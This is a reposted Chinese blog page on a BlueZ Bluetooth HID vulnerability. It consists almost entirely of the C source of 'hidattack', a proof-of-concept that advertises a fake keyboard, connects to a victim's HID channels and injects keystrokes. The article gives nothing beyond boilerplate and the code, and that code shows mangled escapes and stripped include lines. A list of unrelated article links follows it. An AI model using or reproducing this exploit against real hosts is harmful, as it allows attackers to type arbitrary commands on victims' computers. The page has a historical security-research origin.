BlueZ HID不安全设备连接漏洞

2023-11-08 15:38

本文主要是介绍BlueZ HID不安全设备连接漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

BlueZ HID不安全设备连接漏洞

*
* hidattack v0.1
*
* (c) Collin R. Mulliner
* http://www.mulliner.org/bluetooth/
*
* License: GPLv2
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include

#include
#include
#include
#include
#include
#include

#include "hid.h"
#include "sdp.h"

int cs;
int is;

/*
* taken from BlueZ
*/
static int l2cap_listen(const bdaddr_t *bdaddr, unsigned short psm, int lm, int backlog)
{
  struct sockaddr_l2 addr;
  struct l2cap_options opts;
  int sk;

  if ((sk = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP)) < 0)
    return -1;

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, bdaddr);
  addr.l2_psm = htobs(psm);

  if (bind(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  setsockopt(sk, SOL_L2CAP, L2CAP_LM, &lm, sizeof(lm));

  memset(&opts, 0, sizeof(opts));
  opts.imtu = HIDP_DEFAULT_MTU;
  opts.omtu = HIDP_DEFAULT_MTU;
  opts.flush_to = 0xffff;

  setsockopt(sk, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts));

  if (listen(sk, backlog) < 0) {
    close(sk);
    return -1;
  }

  return sk;
}

/*
* taken from BlueZ
*/
static int l2cap_connect(bdaddr_t *src, bdaddr_t *dst, unsigned short psm)
{
  struct sockaddr_l2 addr;
  struct l2cap_options opts;
  int sk;

  if ((sk = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP)) < 0)
    return -1;

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, src);

  if (bind(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  memset(&opts, 0, sizeof(opts));
  opts.imtu = HIDP_DEFAULT_MTU;
  opts.omtu = HIDP_DEFAULT_MTU;
  opts.flush_to = 0xffff;

  setsockopt(sk, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts));

  memset(&addr, 0, sizeof(addr));
  addr.l2_family = AF_BLUETOOTH;
  bacpy(&addr.l2_bdaddr, dst);
  addr.l2_psm = htobs(psm);

  if (connect(sk, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
    close(sk);
    return -1;
  }

  return sk;
}

/*
* taken from BlueZ
*/
static int l2cap_accept(int sk, bdaddr_t *bdaddr)
{
  struct sockaddr_l2 addr;
  socklen_t addrlen;
  int nsk;

  memset(&addr, 0, sizeof(addr));
  addrlen = sizeof(addr);

  if ((nsk = accept(sk, (struct sockaddr *) &addr, &addrlen)) < 0)
    return -1;

  if (bdaddr)
    bacpy(bdaddr, &addr.l2_bdaddr);

  return nsk;
}

void usage()
{
  fprintf(stderr,  "/nhidattack v0.1 Dec. 2005 Collin R. Mulliner /n/n"/
                  "syntax: hidattack -hsce/n/n"/
                  "/th/t/thelp/n"/
                  "/ts/t/tserver mode/n"/
                  "/tc /tclient mode - connect to addr/n"/
                  "/te /tevent file/n");
}

int main(int argc, char **argv)
{
  unsigned char pkg[12];
  int ip;
  int i = 0;
  struct input_event ie;
  bdaddr_t dst;
  struct pollfd pf[3];
  unsigned char ib[1024];
  unsigned char cb[1024];
  int state = 0;
  unsigned char modifiers = 0;
  unsigned char modifiers_old = 0;
  int press = 0;
  int press_old = 0;
  int bitmask[8] = {0};
  int mode = -1;
  char event_file[256] = {0};
  int optid;


  while ((optid = getopt(argc, argv, "hsc:e:")) != -1) {
    switch (optid) {
    case &#39;s&#39;:
      mode = 0;
      break;
    case &#39;c&#39;:
      mode = 1;
      str2ba(optarg, &dst);
      break;
    case &#39;e&#39;:
      strcpy(event_file, optarg);
      break;
    default:
      usage();
      exit(0);
    }
  }

  if (sdp_open()) {
    sdp_add_keyboard();
  }
  else {
    fprintf(stderr, "can&#39;t connect to local SDP server/n");
    usage();
    exit(0);
  }
  
  if ((ip = open(event_file, O_RDONLY)) < 0) {
    perror("open event input");
    usage();
    exit(0);
  }

  printf("/nhidattack DEM0 (c) Collin R. Mulliner http://www.mulliner.org/bluetooth//n/n");
  
  if (mode == 0) {
    cs = l2cap_listen(BDADDR_ANY, L2CAP_PSM_HIDP_CTRL, 0, 1);
    is = l2cap_listen(BDADDR_ANY, L2CAP_PSM_HIDP_INTR, 0, 1);
    cs = l2cap_accept(cs, NULL);
    perror("HID control channel");
    is = l2cap_accept(is, NULL);
    perror("HID interupt channel");
  }
  else if (mode == 1) {
    cs = l2cap_connect(BDADDR_ANY, &dst, L2CAP_PSM_HIDP_CTRL);
    perror("HID control channel");
    is = l2cap_connect(BDADDR_ANY, &dst, L2CAP_PSM_HIDP_INTR);
    perror("HID interupt channel");
  }
  else {
    fprintf(stderr, "wrong mode/n");
    exit(-1);
  }

  pf[0].fd = ip;
  pf[0].events = POLLIN | POLLERR | POLLHUP;
  pf[1].fd = cs;
  pf[1].events = POLLIN | POLLERR | POLLHUP;
  pf[2].fd = is;
  pf[2].events = POLLIN | POLLERR | POLLHUP;
  
  while (1) {
    pf[0].revents = 0;
    pf[1].revents = 0;
    pf[2].revents = 0;
   
    if (poll(pf, 3, -1) <= 0) {
      continue;
    }
   
    bzero(pkg, 12);

    if (pf[0].revents) {
      if (state == 1) {
      if (read(ip, &ie, sizeof(ie)) <= 0) {
        perror("read ip");
        exit(-1);
      }
      if (ie.type == 0x01) {
        if (state == 1) {

          modifiers_old = modifiers;
          press_old = press;

          switch (ie.code) {
          case KEY_LEFTSHIFT:
            bitmask[1] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTSHIFT:
            bitmask[5] = (ie.value ? 1 : 0);
            break;
          case KEY_LEFTALT:
            bitmask[2] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTALT:
            bitmask[6] = (ie.value ? 1 : 0);
            break;
          case KEY_LEFTCTRL:
            bitmask[0] = (ie.value ? 1 : 0);
            break;
          case KEY_RIGHTCTRL:
            bitmask[4] = (ie.value ? 1 : 0);
            break;
          default:
            if (ie.value > 0) {
              pkg[4] = keycode2hidp[ie.code];
              //printf("keycode=%d, hidp=%d/n",ie.code,pkg[4]);
              press++;
            }
            else {
              press--;
            }
            break;
          }
         
          modifiers = 0;
          for (i = 0; i < 8; i++) {
            modifiers |= (bitmask << i);
          }
          //printf("modifiers: 0x%02x/n", modifiers);
         
          if (press != press_old || modifiers != modifiers_old) {
            pkg[0] = 0xa1;
            pkg[1] = 0x01;
            pkg[2] = modifiers;
            pkg[3] = 0x00;
            //pkg[4] = 0x00; // the key code
            pkg[5] = 0x00;
            pkg[6] = 0x00;
            pkg[7] = 0x00;
            pkg[8] = 0x00;
            pkg[9] = 0x00;
         
          if (write(is, pkg, 10) <= 0) {
              perror("write");
              exit(-1);
            }
          }
        }
      }
      }
    }
    if (pf[1].revents) {
      int size;
      int i;
      if ((size = read(cs, cb, sizeof(cb))) <= 0) {
        perror("read cs");
        exit(-1);
      }

      printf("cs(%d)/n", size);
      for (i = 0; i < size; i++)
        printf("%02x",cb);
      printf("/n");

      if (state == 0 && size == 1 && cb[0] == 0x70) {
        fprintf(stderr, "got set_protocol BOOT/n");
        pkg[0] = 0;
        write(cs, pkg, 1);
        state = 1;
      }
    }
    if (pf[2].revents) {
      int size;
      int i;
      if ((size = read(is, ib, sizeof(ib))) <= 0) {
        perror("read is");
        exit(-1);
      }
      printf("is(%d): ", size);
      for (i = 0; i < size; i++)
        printf("%02x",ib);
      printf("/n");
   
    }
  }
}

这篇关于BlueZ HID不安全设备连接漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/370839

相关文章

Spring Boot 整合 MyBatis 连接数据库及常见问题

《SpringBoot整合MyBatis连接数据库及常见问题》MyBatis是一个优秀的持久层框架,支持定制化SQL、存储过程以及高级映射,下面详细介绍如何在SpringBoot项目中整合My... 目录一、基本配置1. 添加依赖2. 配置数据库连接二、项目结构三、核心组件实现(示例)1. 实体类2. Ma

电脑win32spl.dll文件丢失咋办? win32spl.dll丢失无法连接打印机修复技巧

《电脑win32spl.dll文件丢失咋办?win32spl.dll丢失无法连接打印机修复技巧》电脑突然提示win32spl.dll文件丢失,打印机死活连不上,今天就来给大家详细讲解一下这个问题的解... 不知道大家在使用电脑的时候是否遇到过关于win32spl.dll文件丢失的问题,win32spl.dl

Windows Server服务器上配置FileZilla后,FTP连接不上?

《WindowsServer服务器上配置FileZilla后,FTP连接不上?》WindowsServer服务器上配置FileZilla后,FTP连接错误和操作超时的问题,应该如何解决?首先,通过... 目录在Windohttp://www.chinasem.cnws防火墙开启的情况下,遇到的错误如下:无法与

IDEA连接达梦数据库的详细配置指南

《IDEA连接达梦数据库的详细配置指南》达梦数据库(DMDatabase)作为国产关系型数据库的代表,广泛应用于企业级系统开发,本文将详细介绍如何在IntelliJIDEA中配置并连接达梦数据库,助力... 目录准备工作1. 下载达梦JDBC驱动配置步骤1. 将驱动添加到IDEA2. 创建数据库连接连接参数

pycharm远程连接服务器运行pytorch的过程详解

《pycharm远程连接服务器运行pytorch的过程详解》:本文主要介绍在Linux环境下使用Anaconda管理不同版本的Python环境,并通过PyCharm远程连接服务器来运行PyTorc... 目录linux部署pytorch背景介绍Anaconda安装Linux安装pytorch虚拟环境安装cu

Nginx设置连接超时并进行测试的方法步骤

《Nginx设置连接超时并进行测试的方法步骤》在高并发场景下,如果客户端与服务器的连接长时间未响应,会占用大量的系统资源,影响其他正常请求的处理效率,为了解决这个问题,可以通过设置Nginx的连接... 目录设置连接超时目的操作步骤测试连接超时测试方法:总结:设置连接超时目的设置客户端与服务器之间的连接

SQL 中多表查询的常见连接方式详解

《SQL中多表查询的常见连接方式详解》本文介绍SQL中多表查询的常见连接方式,包括内连接(INNERJOIN)、左连接(LEFTJOIN)、右连接(RIGHTJOIN)、全外连接(FULLOUTER... 目录一、连接类型图表(ASCII 形式)二、前置代码(创建示例表)三、连接方式代码示例1. 内连接(I

java如何通过Kerberos认证方式连接hive

《java如何通过Kerberos认证方式连接hive》该文主要介绍了如何在数据源管理功能中适配不同数据源(如MySQL、PostgreSQL和Hive),特别是如何在SpringBoot3框架下通过... 目录Java实现Kerberos认证主要方法依赖示例续期连接hive遇到的问题分析解决方式扩展思考总

Python中连接不同数据库的方法总结

《Python中连接不同数据库的方法总结》在数据驱动的现代应用开发中,Python凭借其丰富的库和强大的生态系统,成为连接各种数据库的理想编程语言,下面我们就来看看如何使用Python实现连接常用的几... 目录一、连接mysql数据库二、连接PostgreSQL数据库三、连接SQLite数据库四、连接Mo

oracle如何连接登陆SYS账号

《oracle如何连接登陆SYS账号》在Navicat12中连接Oracle11g的SYS用户时,如果设置了新密码但连接失败,可能是因为需要以SYSDBA或SYSOPER角色连接,解决方法是确保在连接... 目录oracle连接登陆NmOtMSYS账号工具问题解决SYS用户总结oracle连接登陆SYS账号